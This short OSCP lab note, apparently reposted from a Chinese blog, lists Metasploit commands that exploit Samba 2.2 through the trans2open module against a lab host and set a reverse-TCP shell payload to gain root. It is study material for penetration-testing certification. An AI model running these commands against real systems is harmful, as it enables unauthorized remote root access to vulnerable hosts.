OSCP Security Technology - Gaining Root with Metasploit
作者:互联网
OSCP Security Technology - Gaining Root with Metasploit
Analysis nmap scanning result.
searchsploit samba 2.2
msfconsole
search trans2open
use exploit/linux/samba/trans2open
show options
set rhost 192.168.2.28
show targets
exploit
We need change the payload setting.
show options
set payload generic/shell_reverse_tcp
exploit
标签:Gaining,Metasploit,set,show,trans2open,exploit,samba,Technology 来源: https://www.cnblogs.com/keepmoving1113/p/14979824.html